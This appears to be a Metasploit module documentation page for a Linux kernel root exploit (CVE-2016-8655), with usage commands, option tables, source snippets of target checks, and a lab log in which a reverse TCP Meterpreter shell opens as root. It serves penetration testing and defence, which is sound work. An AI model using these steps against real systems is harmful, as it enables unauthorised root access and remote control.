AF_PACKET chocobo_root Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/af_packet_chocobo_root_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: AF_PACKET chocobo_root Privilege Escalation
Module: exploit/linux/local/af_packet_chocobo_root_priv_esc
Source code: modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb
Disclosure date: 2016-08-12
Last modification time: 2020-09-18 11:38:43 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2016-8655

This module is also known as chocobo_root.c.

This module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655). The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled, two or more CPU cores, and SMAP must be disabled. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); Ubuntu 16.04 (x86_64); and Ubuntu 16.04.2 (x86_64).

Module Ranking and Traits


Module Ranking:

  • good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-os-down: Module may crash the OS, and the OS remains down.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/af_packet_chocobo_root_priv_esc
msf exploit(af_packet_chocobo_root_priv_esc) > show targets
    ... a list of targets ...
msf exploit(af_packet_chocobo_root_priv_esc) > set TARGET target-id
msf exploit(af_packet_chocobo_root_priv_esc) > show options
    ... show and set options ...
msf exploit(af_packet_chocobo_root_priv_esc) > set SESSION session-id
msf exploit(af_packet_chocobo_root_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655).

The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint.

The target system must have unprivileged user namespaces enabled, two or more CPU cores, and SMAP must be disabled.

Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel.

Vulnerable Application


This module has been tested successfully on:

  • Linux Mint 17.3 (x86_64)
  • Linux Mint 18 (x86_64)
  • Ubuntu 16.04 (x86_64)
  • Ubuntu 16.04.2 (x86_64)

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. use exploit/linux/local/af_packet_chocobo_root_priv_esc
  4. set SESSION [SESSION]
  5. check
  6. run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

TIMEOUT

Race timeout (seconds). (default: 600)

COMPILE

Options: Auto True False (default: Auto)

Whether the exploit should be live compiled with gcc on the target system, or uploaded as a pre-compiled binary.

Auto will first determine if gcc is installed to compile live on the system, and fall back to uploading a pre-compiled binary.

Compiled Executable


The module makes use of a pre-compiled exploit executable to be used when gcc is not available on the target host for live compiling, or COMPILE is set to False.

The executable was cross-compiled with musl-cross.

./x86_64-linux-musl-gcc -o chocobo_root -s -pie -static chocobo_root.c

Scenarios


  msf5 > use exploit/linux/local/af_packet_chocobo_root_priv_esc 
  msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/af_packet_chocobo_root_priv_esc) > run
  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.iDLrwN3S4.c' (24885 bytes) ...
  [*] Writing '/tmp/.rMIvkKT' (207 bytes) ...
  [*] Launching exploit (Timeout: 600)...
  [*] Sending stage (853256 bytes) to 172.16.191.209
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.209:38530) at 2018-05-07 03:07:21 -0400
  [+] Deleted /tmp/.iDLrwN3S4.c
  [+] Deleted /tmp/.iDLrwN3S4
  [+] Deleted /tmp/.rMIvkKT

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.209
  OS           : Ubuntu 16.04 (Linux 4.4.0-51-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the linux/local/af_packet_chocobo_root_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/af_packet_chocobo_root_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > show info

       Name: AF_PACKET chocobo_root Privilege Escalation
     Module: exploit/linux/local/af_packet_chocobo_root_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2016-08-12

Provided by:
  rebel
  bcoles <[email protected]>

Module stability:
 crash-os-down

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
  SESSION                   yes       The session to run this module on.
  TIMEOUT  600              yes       Race timeout (seconds)

Payload information:

Description:
  This module exploits a race condition and use-after-free in the 
  packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in 
  the Linux kernel to execute code as root (CVE-2016-8655). The bug 
  was initially introduced in 2011 and patched in 2016 in version 
  4.4.0-53.74, potentially affecting a large number of kernels; 
  however this exploit targets only systems using Ubuntu (Trusty / 
  Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on 
  Ubuntu, such as Linux Mint. The target system must have unprivileged 
  user namespaces enabled, two or more CPU cores, and SMAP must be 
  disabled. Bypasses for SMEP and KASLR are included. Failed 
  exploitation may crash the kernel. This module has been tested 
  successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); 
  Ubuntu 16.04 (x86_64); and Ubuntu 16.04.2 (x86_64).

References:
  https://www.exploit-db.com/exploits/40871
  https://nvd.nist.gov/vuln/detail/CVE-2016-8655
  http://www.securityfocus.com/bid/94692
  https://seclists.org/oss-sec/2016/q4/607
  https://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin
  https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c
  https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c
  https://usn.ubuntu.com/3151-1/
  https://www.securitytracker.com/id/1037403
  https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c

Also known as:
  chocobo_root.c

Module Options


This is a complete list of options available in the linux/local/af_packet_chocobo_root_priv_esc exploit:

msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > show options

Module options (exploit/linux/local/af_packet_chocobo_root_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on.
   TIMEOUT  600              yes       Race timeout (seconds)

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/af_packet_chocobo_root_priv_esc exploit:

msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > show advanced

Module advanced options (exploit/linux/local/af_packet_chocobo_root_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/af_packet_chocobo_root_priv_esc module can exploit:

msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/af_packet_chocobo_root_priv_esc exploit:

msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/adduser                                          normal  No     Linux Add User
   19  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   20  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   22  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   23  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   24  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   25  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   26  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   27  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   31  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   32  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   33  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   34  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   35  payload/linux/x86/read_file                                        normal  No     Linux Read File
   36  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   37  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   38  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   39  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   40  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   41  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   42  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   46  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   47  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   48  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   49  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/af_packet_chocobo_root_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/af_packet_chocobo_root_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

System architecture <ARCH> is not supported


Here is a relevant code snippet related to the "System architecture <ARCH> is not supported" error message:

92:	  end
93:	
94:	  def check
95:	    arch = kernel_hardware
96:	    unless arch.include? 'x86_64'
97:	      return CheckCode::Safe("System architecture #{arch} is not supported")
98:	    end
99:	    vprint_good "System architecture #{arch} is supported"
100:	
101:	    offsets = strip_comments(exploit_data('CVE-2016-8655', 'chocobo_root.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
102:	    kernels = offsets.scan(/"(.+?)"/).flatten

Linux kernel <VERSION> is not vulnerable


Here is a relevant code snippet related to the "Linux kernel <VERSION> is not vulnerable" error message:

101:	    offsets = strip_comments(exploit_data('CVE-2016-8655', 'chocobo_root.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
102:	    kernels = offsets.scan(/"(.+?)"/).flatten
103:	
104:	    version = "#{kernel_release} #{kernel_version.split(' ').first}"
105:	    unless kernels.include? version
106:	      return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
107:	    end
108:	    vprint_good "Linux kernel #{version} is vulnerable"
109:	
110:	    if smap_enabled?
111:	      return CheckCode::Safe('SMAP is enabled')

SMAP is enabled


Here is a relevant code snippet related to the "SMAP is enabled" error message:

106:	      return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
107:	    end
108:	    vprint_good "Linux kernel #{version} is vulnerable"
109:	
110:	    if smap_enabled?
111:	      return CheckCode::Safe('SMAP is enabled')
112:	    end
113:	    vprint_good 'SMAP is not enabled'
114:	
115:	    if lkrg_installed?
116:	      return CheckCode::Safe('LKRG is installed')

LKRG is installed


Here is a relevant code snippet related to the "LKRG is installed" error message:

111:	      return CheckCode::Safe('SMAP is enabled')
112:	    end
113:	    vprint_good 'SMAP is not enabled'
114:	
115:	    if lkrg_installed?
116:	      return CheckCode::Safe('LKRG is installed')
117:	    end
118:	    vprint_good 'LKRG is not installed'
119:	
120:	    if grsec_installed?
121:	      return CheckCode::Safe('grsecurity is in use')

grsecurity is in use


Here is a relevant code snippet related to the "grsecurity is in use" error message:

116:	      return CheckCode::Safe('LKRG is installed')
117:	    end
118:	    vprint_good 'LKRG is not installed'
119:	
120:	    if grsec_installed?
121:	      return CheckCode::Safe('grsecurity is in use')
122:	    end
123:	    vprint_good 'grsecurity is not in use'
124:	
125:	    cores = get_cpu_info[:cores].to_i
126:	    min_required_cores = 2

System has less than <MIN_REQUIRED_CORES> CPU cores


Here is a relevant code snippet related to the "System has less than <MIN_REQUIRED_CORES> CPU cores" error message:

123:	    vprint_good 'grsecurity is not in use'
124:	
125:	    cores = get_cpu_info[:cores].to_i
126:	    min_required_cores = 2
127:	    unless cores >= min_required_cores
128:	      return CheckCode::Safe("System has less than #{min_required_cores} CPU cores")
129:	    end
130:	    vprint_good "System has #{cores} CPU cores"
131:	
132:	    config = kernel_config
133:	    if config.nil?

Could not retrieve kernel config


Here is a relevant code snippet related to the "Could not retrieve kernel config" error message:

129:	    end
130:	    vprint_good "System has #{cores} CPU cores"
131:	
132:	    config = kernel_config
133:	    if config.nil?
134:	      return CheckCode::Unknown('Could not retrieve kernel config')
135:	    end
136:	
137:	    unless config.include? 'CONFIG_USER_NS=y'
138:	      return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS')
139:	    end

Kernel config does not include CONFIG_USER_NS


Here is a relevant code snippet related to the "Kernel config does not include CONFIG_USER_NS" error message:

133:	    if config.nil?
134:	      return CheckCode::Unknown('Could not retrieve kernel config')
135:	    end
136:	
137:	    unless config.include? 'CONFIG_USER_NS=y'
138:	      return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS')
139:	    end
140:	    vprint_good 'Kernel config has CONFIG_USER_NS enabled'
141:	
142:	    unless userns_enabled?
143:	      return CheckCode::Safe('Unprivileged user namespaces are not permitted')

Unprivileged user namespaces are not permitted


Here is a relevant code snippet related to the "Unprivileged user namespaces are not permitted" error message:

138:	      return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS')
139:	    end
140:	    vprint_good 'Kernel config has CONFIG_USER_NS enabled'
141:	
142:	    unless userns_enabled?
143:	      return CheckCode::Safe('Unprivileged user namespaces are not permitted')
144:	    end
145:	    vprint_good 'Unprivileged user namespaces are permitted'
146:	
147:	    CheckCode::Appears
148:	  end

Session already has root privileges. Set ForceExploit to override.


Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:

148:	  end
149:	
150:	  def exploit
151:	    if is_root?
152:	      unless datastore['ForceExploit']
153:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
154:	      end
155:	    end
156:	
157:	    unless writable? base_dir
158:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"

<BASE_DIR> is not writable


Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:

153:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
154:	      end
155:	    end
156:	
157:	    unless writable? base_dir
158:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
159:	    end
160:	
161:	    # Upload exploit executable
162:	    executable_name = ".#{rand_text_alphanumeric(5..10)}"
163:	    executable_path = "#{base_dir}/#{executable_name}"

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • rebel
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.